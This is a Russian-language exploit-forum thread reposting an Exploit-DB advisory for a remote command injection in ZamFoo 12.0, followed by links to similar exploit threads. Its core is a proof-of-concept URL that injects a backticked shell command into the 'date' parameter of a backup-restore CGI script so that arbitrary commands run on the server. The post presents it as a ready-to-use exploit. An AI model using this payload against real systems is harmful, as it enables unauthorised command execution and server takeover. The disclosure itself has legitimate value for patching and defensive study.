Exploit ZamFoo - 'date' Remote Command Injection

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 453 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

#1

EDB-ID: 38598

Проверка EDB

Пройдено

Автор: LOCALHOST.RE

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: N/A

Дата публикации: 2013-06-15

ZamFoo - 'date' Remote Command Injection

Код:

source: https://www.securityfocus.com/bid/60826/info

ZamFoo is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to execute arbitrary commands in the context of the application.

ZamFoo 12.0 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit ZamFoo - Multiple Remote Command Execution Vulnerabilities

Ответы: 0

Просмотры: 459

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit MyWeight 1.0 - 'user_addfood.php?date' Cross-Site Scripting

Ответы: 0

Просмотры: 421

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit WebStatCaffe - '/stat/referer.php?date' Cross-Site Scripting

Ответы: 0

Просмотры: 423

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit WebStatCaffe - '/stat/pageviewerschart.php?date' Cross-Site Scripting

Ответы: 0

Просмотры: 407

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit WebStatCaffe - '/stat/pageviewers.php?date' Cross-Site Scripting

Ответы: 0

Просмотры: 411

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit eGroupWare 1.0 Calendar Module - 'date' Cross-Site Scripting

Ответы: 0

Просмотры: 403

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows - 'April Fools 2001' Set Incorrect Date

Ответы: 0

Просмотры: 393

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Joomla! Component Spider Calendar - 'date' Blind SQL Injection

Ответы: 0

Просмотры: 388

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit LifeType 1.0.5 - 'index.php?Date' SQL Injection

Ответы: 0

Просмотры: 364

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit EVA-Web 2.1.2 - 'rubrique.php3?date' Cross-Site Scripting

Ответы: 0

Просмотры: 356

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.